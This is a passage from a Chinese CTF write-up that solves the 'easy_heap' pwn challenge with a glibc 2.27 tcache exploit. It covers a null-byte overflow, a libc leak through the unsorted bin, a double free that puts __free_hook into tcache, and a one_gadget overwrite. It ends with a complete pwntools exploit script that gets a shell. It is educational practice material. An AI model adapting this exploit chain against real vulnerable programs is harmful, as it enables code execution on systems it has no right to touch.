<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">6</span>):</span><br><span class="line">    add(<span class="number">0x90</span>,<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">add(<span class="number">0x90</span>,<span class="string">&#x27;bbbb&#x27;</span>)<span class="comment">#chunk 6</span></span><br><span class="line">add(<span class="number">0x90</span>,<span class="string">&#x27;cccc&#x27;</span>)<span class="comment">#chunk 7</span></span><br><span class="line">add(<span class="number">0x90</span>,<span class="string">&#x27;dddd&#x27;</span>)<span class="comment">#chunk 8</span></span><br><span class="line">add(<span class="number">0x90</span>,<span class="string">&#x27;eeee&#x27;</span>)<span class="comment">#chunk 9</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">6</span>): <span class="comment">#删除chunk0-chunk5</span></span><br><span class="line">     dele(i)</span><br><span class="line">dele(<span class="number">9</span>)            <span class="comment">#先删除chunk9 防止chunk6-chunk8与top chunk合并</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">6</span>,<span class="number">9</span>):  <span class="comment">#修改pre_size</span></span><br><span class="line">     dele(i)</span><br></pre></td></tr></table></figure>

<table>
<thead>
<tr>
<th align="center"><strong>chunk0</strong></th>
<th align="center"><strong>chunk1</strong></th>
<th align="center"><strong>chunk2</strong></th>
<th align="center"><strong>chunk3</strong></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><strong>0x560d334f0300</strong></td>
<td align="center"><strong>0x560d334f0400</strong></td>
<td align="center"><strong>0x560d334f0500</strong></td>
<td align="center"><strong>0x560d334f0600</strong></td>
</tr>
<tr>
<td align="center"><strong>chunk4</strong></td>
<td align="center"><strong>chunk5</strong></td>
<td align="center"><strong>chunk6</strong></td>
<td align="center"><strong>chunk7</strong></td>
</tr>
<tr>
<td align="center"><strong>0x560d334f0700</strong></td>
<td align="center"><strong>0x560d334f0800</strong></td>
<td align="center"><strong>0x560d334f0900</strong></td>
<td align="center"><strong>0x560d334f0a00</strong></td>
</tr>
<tr>
<td align="center"><strong>chunk8</strong></td>
<td align="center"><strong>chunk9</strong></td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center"><strong>0x560d334f0b00</strong></td>
<td align="center"><strong>0x560d334f0c00</strong></td>
<td align="center"></td>
<td align="center"></td>
</tr>
</tbody></table>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053216.png" alt="image-20220417164252755"></p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053217.png" alt="image-20220417164454692"></p>
<h4 id="null-byte-overflow漏洞覆盖inuse标志位"><a href="#null-byte-overflow漏洞覆盖inuse标志位" class="headerlink" title="null-byte-overflow漏洞覆盖inuse标志位"></a>null-byte-overflow漏洞覆盖inuse标志位</h4><p>现在我们已经写好了0x560d334f0b00的prev_size，接下来需要做的就是覆盖其inuse位了，那么既然要覆盖，就需要重新启用bin中的堆块，这里需要注意的是bin中如果tcache bin中有满足需求的空闲块，则优先在tcache中分配。所以我们需要首先申请7个chunk将tcache清空，但是这里还需要注意的是tcache中堆块被拿出的顺序，由于在之前为了防止chunk6、chunk7、chunk8被top chunk合并，所以最后释放进tcache bin中的堆块为chunk9，那么由于tcache的LIFO先进后出的分配机制，所以首先被分配的应该是chunk9，所以在分配7chunk后表格中的位置对应地址为：</p>
<table>
<thead>
<tr>
<th align="center"><strong>chunk0</strong></th>
<th align="center"><strong>chunk1</strong></th>
<th align="center"><strong>chunk2</strong></th>
<th align="center"><strong>chunk3</strong></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><strong>0x560d334f0c00</strong></td>
<td align="center"><strong>0x560d334f0800</strong></td>
<td align="center"><strong>0x560d334f0700</strong></td>
<td align="center"><strong>0x560d334f0600</strong></td>
</tr>
<tr>
<td align="center"><strong>chunk4</strong></td>
<td align="center"><strong>chunk5</strong></td>
<td align="center"><strong>chunk6</strong></td>
<td align="center"><strong>chunk7</strong></td>
</tr>
<tr>
<td align="center"><strong>0x560d334f0500</strong></td>
<td align="center"><strong>0x560d334f0400</strong></td>
<td align="center"><strong>0x560d334f0300</strong></td>
<td align="center"><strong>空</strong></td>
</tr>
<tr>
<td align="center"><strong>chunk8</strong></td>
<td align="center"><strong>chunk9</strong></td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center"><strong>空</strong></td>
<td align="center"><strong>空</strong></td>
<td align="center"></td>
<td align="center"></td>
</tr>
</tbody></table>
<p>我们再去申请chunk的话就，就会直接从unsorted bin中分割了。</p>
<table>
<thead>
<tr>
<th align="center">chunk0</th>
<th align="center">chunk1</th>
<th align="center">chunk2</th>
<th align="center">chunk3</th>
</tr>
</thead>
<tbody><tr>
<td align="center"><strong>0x560d334f0c00</strong></td>
<td align="center"><strong>0x560d334f0800</strong></td>
<td align="center"><strong>0x560d334f0700</strong></td>
<td align="center"><strong>0x560d334f0600</strong></td>
</tr>
<tr>
<td align="center"><strong>chunk4</strong></td>
<td align="center"><strong>chunk5</strong></td>
<td align="center"><strong>chunk6</strong></td>
<td align="center"><strong>chunk7</strong></td>
</tr>
<tr>
<td align="center"><strong>0x560d334f0500</strong></td>
<td align="center"><strong>0x560d334f0400</strong></td>
<td align="center"><strong>0x560d334f0300</strong></td>
<td align="center"><strong>0x560d334f0900</strong></td>
</tr>
<tr>
<td align="center"><strong>chunk8</strong></td>
<td align="center"><strong>chunk9</strong></td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center"><strong>0x560d334f0a00</strong></td>
<td align="center"><strong>0x560d334f0b00</strong></td>
<td align="center"></td>
<td align="center"></td>
</tr>
</tbody></table>
<p>所以接下来我们还需要倒一次bin，依然还是先释放chunk0 - chunk5，不过这里单释放的是chunk8</p>
<p>这里释放chunk8的原因如下：</p>
<ul>
<li>第一是利用chunk8填满tcache，接下来再释放chunk7的时候chunk7就会被挂进unsorted bin中，这样chunk7的fd和bk就会指向unsorted bin</li>
<li>第二个原因是，chunk8落在tcache bin的结尾，由于LIFO分配机制的原因，重新申请chunk的时候chunk8就会第一个被启用，这样一来由于chunk8与chunk9是物理相邻的，所以通过对chunk8进行null-byte-overflow就可以直接覆盖chunk9的inuse标志位了</li>
<li>第三个原因是防止接下来释放的chunk7与top chunk合并</li>
</ul>
<p>释放chunk7</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053218.png" alt="image-20220417171034413"></p>
<p>重新申请chunk8，对chunk9的inuse标志位进行覆盖：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053219.png" alt="image-20220417173145708"></p>
<p>此时各个chunk的对应情况为：</p>
<table>
<thead>
<tr>
<th align="center"><strong>chunk0</strong></th>
<th align="center"><strong>chunk1</strong></th>
<th align="center"><strong>chunk2</strong></th>
<th align="center"><strong>chunk3</strong></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><strong>0x560d334f0a00</strong></td>
<td align="center"><strong>tcache</strong></td>
<td align="center"><strong>tcache</strong></td>
<td align="center"><strong>tcache</strong></td>
</tr>
<tr>
<td align="center"><strong>chunk4</strong></td>
<td align="center"><strong>chunk5</strong></td>
<td align="center"><strong>chunk6</strong></td>
<td align="center"><strong>chunk7</strong></td>
</tr>
<tr>
<td align="center"><strong>tcache</strong></td>
<td align="center"><strong>tcache</strong></td>
<td align="center"><strong>0x560d334f0300</strong></td>
<td align="center"><strong>unsorted bin</strong></td>
</tr>
<tr>
<td align="center"><strong>chunk8</strong></td>
<td align="center"><strong>chunk9</strong></td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center"><strong>空</strong></td>
<td align="center"><strong>0x560d334f0b00</strong></td>
<td align="center"></td>
<td align="center"></td>
</tr>
</tbody></table>
<p>由于我们修改了chunk9的inuse标志位，且chunk0是chunk9物理相邻的前一个chunk，所以即使chunk0处于使用状态，但现在被chunk9强迫标志为被释放堆块。那么如果将chunk9释放后挂进unsorted bin中，那么chunk7、chunk0、chunk9还是会被认为是连续释放进unsorted bin之后合并的大块。</p>
<p>此时chunk7的fd和bk指向的unsorted bin，如果这个时候将chunk7分配走，那么物理相邻的chunk0就会被认为是已分割后剩余堆块的头部，那么这个时候chunk0的fd指针和bk指针就会指向unsorted bin。</p>
<p>这样一来chunk0虽然是使用状态，这样一来我们就可以调用程序自身的输出函数输出chunk0，连带着就会将unsorted bin地址输出出来</p>
<h4 id="泄露unsorted-bin地址"><a href="#泄露unsorted-bin地址" class="headerlink" title="泄露unsorted bin地址"></a>泄露unsorted bin地址</h4><p>我们首先释放chunk 6，填满tcache</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053220.png" alt="image-20220417174927149"></p>
<p>然后释放chunk 9，chunk7 chunk0和chunk9合并，由于tcache 填满，所以合并后的块会放入unsorted bin 中</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053221.png" alt="image-20220417175022665"></p>
<p>接下来，将tcache清空</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053222.png" alt="image-20220417175150515"></p>
<p>此时各个chunk的对应情况为</p>
<table>
<thead>
<tr>
<th align="center"><strong>chunk0</strong></th>
<th align="center"><strong>chunk1</strong></th>
<th align="center"><strong>chunk2</strong></th>
<th align="center"><strong>chunk3</strong></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><strong>0x560d334f0a00</strong></td>
<td align="center"><strong>0x560d334f0300</strong></td>
<td align="center"><strong>0x560d334f0400</strong></td>
<td align="center"><strong>0x560d334f0500</strong></td>
</tr>
<tr>
<td align="center"><strong>chunk4</strong></td>
<td align="center"><strong>chunk5</strong></td>
<td align="center"><strong>chunk6</strong></td>
<td align="center"><strong>chunk7</strong></td>
</tr>
<tr>
<td align="center"><strong>0x560d334f0600</strong></td>
<td align="center"><strong>0x560d334f0700</strong></td>
<td align="center"><strong>0x560d334f0800</strong></td>
<td align="center"><strong>0x560d334f0c00</strong></td>
</tr>
<tr>
<td align="center"><strong>chunk8</strong></td>
<td align="center"><strong>chunk9</strong></td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center"><strong>空</strong></td>
<td align="center"><strong>unsorted</strong></td>
<td align="center"></td>
<td align="center"></td>
</tr>
</tbody></table>
<p>此时申请一个chunk 即从unsorted bin中切割一块，并放到chunk 8处，之前0x560d334f0900处的的fd和bk指向的unsorted bin，切割后0x560d334f0a00 的fd和bk指向unsorted bin，那么我们打印chunk0（0x560d334f0a00  ）即可泄露基址</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053223.png" alt="image-20220417182515721"></p>
<p>此时各个chunk的对应情况为：</p>
<table>
<thead>
<tr>
<th align="center"><strong>chunk0</strong></th>
<th align="center"><strong>chunk1</strong></th>
<th align="center"><strong>chunk2</strong></th>
<th align="center"><strong>chunk3</strong></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><strong>0x560d334f0a00</strong></td>
<td align="center"><strong>0x560d334f0300</strong></td>
<td align="center"><strong>0x560d334f0400</strong></td>
<td align="center"><strong>0x560d334f0500</strong></td>
</tr>
<tr>
<td align="center"><strong>chunk4</strong></td>
<td align="center"><strong>chunk5</strong></td>
<td align="center"><strong>chunk6</strong></td>
<td align="center"><strong>chunk7</strong></td>
</tr>
<tr>
<td align="center"><strong>0x560d334f0600</strong></td>
<td align="center"><strong>0x560d334f0700</strong></td>
<td align="center"><strong>0x560d334f0800</strong></td>
<td align="center"><strong>0x560d334f0c00</strong></td>
</tr>
<tr>
<td align="center"><strong>chunk8</strong></td>
<td align="center"><strong>chunk9</strong></td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center"><strong>0x560d334f0900</strong></td>
<td align="center"><strong>unsorted</strong></td>
<td align="center"></td>
<td align="center"></td>
</tr>
</tbody></table>
<h4 id="构建Double-Free，将free-hook挂进tcache-bin"><a href="#构建Double-Free，将free-hook挂进tcache-bin" class="headerlink" title="构建Double Free，将free_hook挂进tcache bin"></a>构建Double Free，将free_hook挂进tcache bin</h4><p>如果再去申请一个堆块的话，就会从unsorted bin中的合并堆块分割，即<code>0x560d334f0a00</code>不仅会存放进chunk0，还会存放进chunk9：</p>
<p>此时各个chunk的对应情况为：</p>
<table>
<thead>
<tr>
<th align="center"><strong>chunk0</strong></th>
<th align="center"><strong>chunk1</strong></th>
<th align="center"><strong>chunk2</strong></th>
<th align="center"><strong>chunk3</strong></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><strong>0x560d334f0a00</strong></td>
<td align="center"><strong>0x560d334f0300</strong></td>
<td align="center"><strong>0x560d334f0400</strong></td>
<td align="center"><strong>0x560d334f0500</strong></td>
</tr>
<tr>
<td align="center"><strong>chunk4</strong></td>
<td align="center"><strong>chunk5</strong></td>
<td align="center"><strong>chunk6</strong></td>
<td align="center"><strong>chunk7</strong></td>
</tr>
<tr>
<td align="center"><strong>0x560d334f0600</strong></td>
<td align="center"><strong>0x560d334f0700</strong></td>
<td align="center"><strong>0x560d334f0800</strong></td>
<td align="center"><strong>0x560d334f0c00</strong></td>
</tr>
<tr>
<td align="center"><strong>chunk8</strong></td>
<td align="center"><strong>chunk9</strong></td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center"><strong>0x560d334f0900</strong></td>
<td align="center"><strong>0x560d334f0a00</strong></td>
<td align="center"></td>
<td align="center"></td>
</tr>
</tbody></table>
<p>那么此时chunk0和chunk9中存放的都是<code>0x560d334f0a00</code>，那么这种情况我们可以利用Double Free！</p>
<p>但是这里还需要注意的是tcache虽然对链表中的检查不够严格，但也并不是一点都不检查。还是会对链接tcache bin的堆块做完整性检查的，所以我们需要先将chunk1释放进tcache，为chunk0和chunk9做检查绕过，此时tcache中的情况为：</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053224.png" alt="image-20220417183609892"></p>
<p>可以看到释放两次<code>0x560d334f0a00</code>之后，bin中的空闲块数量还是3，但是只显示了<code>0x560d334f0a00</code>这一个地址。这是因为<code>0x560d334f0a00</code>被释放两次之后其fd指针将会指向自己的data区域地址，这就形成了闭环，导致bin中显示的情况也是自己指向自己。</p>
<p>此时各个chunk的对应情况为：</p>
<table>
<thead>
<tr>
<th align="center"><strong>chunk0</strong></th>
<th align="center"><strong>chunk1</strong></th>
<th align="center"><strong>chunk2</strong></th>
<th align="center"><strong>chunk3</strong></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><strong>tcache2</strong></td>
<td align="center"><strong>tcache1</strong></td>
<td align="center"><strong>0x560d334f0400</strong></td>
<td align="center"><strong>0x560d334f0500</strong></td>
</tr>
<tr>
<td align="center"><strong>chunk4</strong></td>
<td align="center"><strong>chunk5</strong></td>
<td align="center"><strong>chunk6</strong></td>
<td align="center"><strong>chunk7</strong></td>
</tr>
<tr>
<td align="center"><strong>0x560d334f0600</strong></td>
<td align="center"><strong>0x560d334f0700</strong></td>
<td align="center"><strong>0x560d334f0800</strong></td>
<td align="center"><strong>0x560d334f0c00</strong></td>
</tr>
<tr>
<td align="center"><strong>chunk8</strong></td>
<td align="center"><strong>chunk9</strong></td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center"><strong>0x560d334f0900</strong></td>
<td align="center"><strong>tcache3</strong></td>
<td align="center"></td>
<td align="center"></td>
</tr>
</tbody></table>
<p>接下来我们重新申请一个堆块，这时重启的是第二次释放的<code>0x560d334f0a00</code>即tcache3。我们在申请堆块的同时将内容填写成<code>free_hook</code>的地址</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053225.png" alt="image-20220417202118160"></p>
<p>接下来申请第一次释放的<code>0x560d334f0a00</code>即tcache2，现在tcache中只剩余free_hook，然后再次申请就申请出了free_hook,并向其中写入one_gadget</p>
<p><img src="https://cdn.jsdelivr.net/gh/wysyrg/picodemo/img/202204172053226.png" alt="image-20220417202707991"></p>
<p>此时各个chunk的对应情况为：</p>
<table>
<thead>
<tr>
<th align="center"><strong>chunk0</strong></th>
<th align="center"><strong>chunk1</strong></th>
<th align="center"><strong>chunk2</strong></th>
<th align="center"><strong>chunk3</strong></th>
</tr>
</thead>
<tbody><tr>
<td align="center"><strong>0x560d334f0a00</strong></td>
<td align="center"><strong>0x560d334f0a00</strong></td>
<td align="center"><strong>0x560d334f0400</strong></td>
<td align="center"><strong>0x560d334f0500</strong></td>
</tr>
<tr>
<td align="center"><strong>chunk4</strong></td>
<td align="center"><strong>chunk5</strong></td>
<td align="center"><strong>chunk6</strong></td>
<td align="center"><strong>chunk7</strong></td>
</tr>
<tr>
<td align="center"><strong>0x560d334f0600</strong></td>
<td align="center"><strong>0x560d334f0700</strong></td>
<td align="center"><strong>0x560d334f0800</strong></td>
<td align="center"><strong>0x560d334f0c00</strong></td>
</tr>
<tr>
<td align="center"><strong>chunk8</strong></td>
<td align="center"><strong>chunk9</strong></td>
<td align="center"></td>
<td align="center"></td>
</tr>
<tr>
<td align="center"><strong>0x560d334f0900</strong></td>
<td align="center"><strong>free_hook(one_gadget)</strong></td>
<td align="center"></td>
<td align="center"></td>
</tr>
</tbody></table>
<p>接下来delete(0)即可getshell</p>
<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#coding=utf-8</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span>*</span><br><span class="line">context.log_level=<span class="string">&#x27;debug&#x27;</span></span><br><span class="line">p=process(<span class="string">&#x27;./easy_heap&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./easy_heap&#x27;</span>)</span><br><span class="line">libc=ELF(<span class="string">&#x27;./libc-2.27.so&#x27;</span>)</span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">add</span>(<span class="params">size,content</span>):</span></span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;1&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(size))</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(content)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">dele</span>(<span class="params">index</span>):</span></span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;2&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index))</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">show</span>(<span class="params">index</span>):</span></span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt;&#x27;</span>)</span><br><span class="line">    p.sendline(<span class="string">&#x27;3&#x27;</span>)</span><br><span class="line">    p.recvuntil(<span class="string">&#x27;&gt; &#x27;</span>)</span><br><span class="line">    p.sendline(<span class="built_in">str</span>(index))</span><br><span class="line">   </span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">6</span>):</span><br><span class="line">    add(<span class="number">0x90</span>,<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">add(<span class="number">0x90</span>,<span class="string">&#x27;bbbb&#x27;</span>)<span class="comment">#chunk 6</span></span><br><span class="line">add(<span class="number">0x90</span>,<span class="string">&#x27;cccc&#x27;</span>)<span class="comment">#chunk 7</span></span><br><span class="line">add(<span class="number">0x90</span>,<span class="string">&#x27;dddd&#x27;</span>)<span class="comment">#chunk 8</span></span><br><span class="line">add(<span class="number">0x90</span>,<span class="string">&#x27;eeee&#x27;</span>)<span class="comment">#chunk 9</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">6</span>): <span class="comment">#删除chunk0-chunk5</span></span><br><span class="line">     dele(i)</span><br><span class="line">dele(<span class="number">9</span>)            <span class="comment">#先删除chunk9 防止chunk6-chunk8与top chunk合并</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">6</span>,<span class="number">9</span>):  <span class="comment">#修改pre_size</span></span><br><span class="line">     dele(i)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">     add(<span class="number">0x90</span>,<span class="string">&#x27;aaaa&#x27;</span>) <span class="comment">#清空tcache </span></span><br><span class="line"><span class="comment">#分割合并块，保留prev size</span></span><br><span class="line">add(<span class="number">0x90</span>,<span class="string">&#x27;bbbb&#x27;</span>)<span class="comment">#chunk 7</span></span><br><span class="line">add(<span class="number">0x90</span>,<span class="string">&#x27;cccc&#x27;</span>)<span class="comment">#chunk 8</span></span><br><span class="line">add(<span class="number">0x90</span>,<span class="string">&#x27;dddd&#x27;</span>)<span class="comment">#chunk 9</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">6</span>):</span><br><span class="line">      dele(i)  <span class="comment">#填充tcache </span></span><br><span class="line">dele(<span class="number">8</span>)        <span class="comment"># 填满tcache，防止后续释放进unsorted bin中的chunk与top chunk合并</span></span><br><span class="line">dele(<span class="number">7</span>)        <span class="comment">#获得fd指针与bk指针，为后续目标目标堆块的fd和bk指针指向unsorted bin做准备</span></span><br><span class="line"></span><br><span class="line">add(<span class="number">0xf8</span>,<span class="string">&#x27;cccc&#x27;</span>) <span class="comment">#申请上次释放的chunk8 null-byte-overflow漏洞覆盖chunk 9 inuse标志位 此时为chunk0</span></span><br><span class="line"></span><br><span class="line">dele(<span class="number">6</span>)        <span class="comment"># 填满tcache 使得free chunk9为unsorted bin</span></span><br><span class="line">dele(<span class="number">9</span>)        <span class="comment"># 合并chunk7 ,chunk 0,chunk 9</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">7</span>):</span><br><span class="line">      add(<span class="number">0x90</span>,<span class="string">&#x27;aaaa&#x27;</span>)  <span class="comment">#分配完tcache ，使得下次分配从unsorted bin 中分配 chunk1-chunk7</span></span><br><span class="line">add(<span class="number">0x90</span>,<span class="string">&#x27;cccc&#x27;</span>)        <span class="comment">#切割 unsorted bin   chunk8</span></span><br><span class="line">show(<span class="number">0</span>)                 <span class="comment">#泄漏基址</span></span><br><span class="line">libc_leak = u64(p.recvuntil(<span class="string">b&#x27;\x7f&#x27;</span>)[-<span class="number">6</span>:].ljust(<span class="number">8</span>,<span class="string">b&#x27;\x00&#x27;</span>))</span><br><span class="line"><span class="built_in">print</span>(<span class="string">&#x27;libc_leak: &#x27;</span>,<span class="built_in">hex</span>(libc_leak))</span><br><span class="line">libc_base=libc_leak-<span class="number">0x3EBCa0</span> </span><br><span class="line"></span><br><span class="line">add(<span class="number">0x90</span>,<span class="string">&#x27;dddd&#x27;</span>)        <span class="comment">#再次切割unsorted chunk ，使得chunk0和chunk9都存放目标堆块 </span></span><br><span class="line"></span><br><span class="line">dele(<span class="number">1</span>)</span><br><span class="line">dele(<span class="number">0</span>)</span><br><span class="line">dele(<span class="number">9</span>)  <span class="comment">#double free</span></span><br><span class="line"></span><br><span class="line">free_hook=libc_base+libc.symbols[<span class="string">&#x27;__free_hook&#x27;</span>]</span><br><span class="line">add(<span class="number">0x10</span>,p64(free_hook))</span><br><span class="line">add(<span class="number">0x10</span>,<span class="string">&#x27;eeee&#x27;</span>)</span><br><span class="line">one_gadget=libc_base+<span class="number">0x4f302</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;one_gadget: &quot;</span>,<span class="built_in">hex</span>(one_gadget))</span><br><span class="line">add(<span class="number">0x10</span>,p64(one_gadget))</span><br><span class="line">dele(<span class="number">0</span>)</span><br><span class="line">p.interactive() </span><br></pre></td></tr></table></figure>


    </article>
    <!-- license -->
    
    <!-- paginator -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href="/2022/04/18/examination/" title="examination">
                    <div class="nextTitle">examination</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href="/2022/04/08/tcache/" title="tcache">
                    <div class="prevTitle">tcache</div>
                </a>
            
        </li>
    </ul>
    <!-- comment -->
    
        <div class="post-comment">
            <!-- 来必力 City 版安装代码 -->


            

            

            

            <!-- utteranc评论 -->


            <!-- partial('_partial/comment/changyan') -->
            <!--PC版-->


            
            

        </div>
    
    <!-- timeliness note -->
    <!-- idea from: https://hexo.fluid-dev.com/posts/hexo-injector/#%E6%96%87%E7%AB%A0%E6%97%B6%E6%95%88%E6%80%A7%E6%8F%90%E7%A4%BA -->
    
    <!-- Mathjax -->
    
</main>

                <!-- profile -->
                
            </div>
            <footer class="footer footer-unloaded">
    <!-- social  -->
    
        <div class="social">
            
    
        
            
                <a href="mailto:2811745785@qq.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
            
                <a href="//github.com/wysyrg" class="iconfont-archer github" target="_blank" title=github></a>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    


        </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- website approve for Chinese user -->
    
    <!-- 不蒜子  -->
    
        <div class="busuanzi-container">
            
             
                <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
            
        </div>
    	
</footer>

        </div>
        <!-- toc -->
        
            <div class="toc-wrapper toc-wrapper-loding" style=







    top:50vh;

>
                <div class="toc-catalog">
                    <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
                </div>
                <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E4%BF%9D%E6%8A%A4%E6%A3%80%E6%9F%A5"><span class="toc-number">1.</span> <span class="toc-text">保护检查</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#IDA%E5%88%86%E6%9E%90"><span class="toc-number">2.</span> <span class="toc-text">IDA分析</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#main%E5%87%BD%E6%95%B0"><span class="toc-number">2.1.</span> <span class="toc-text">main函数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#add%E5%87%BD%E6%95%B0"><span class="toc-number">2.2.</span> <span class="toc-text">add函数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#sub-BBF-%E5%87%BD%E6%95%B0"><span class="toc-number">2.3.</span> <span class="toc-text">sub_BBF()函数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#del-%E5%87%BD%E6%95%B0"><span class="toc-number">2.4.</span> <span class="toc-text">del()函数</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#show-%E5%87%BD%E6%95%B0"><span class="toc-number">2.5.</span> <span class="toc-text">show()函数</span></a></li></ol></li><li class="toc-item toc-level-3"><a 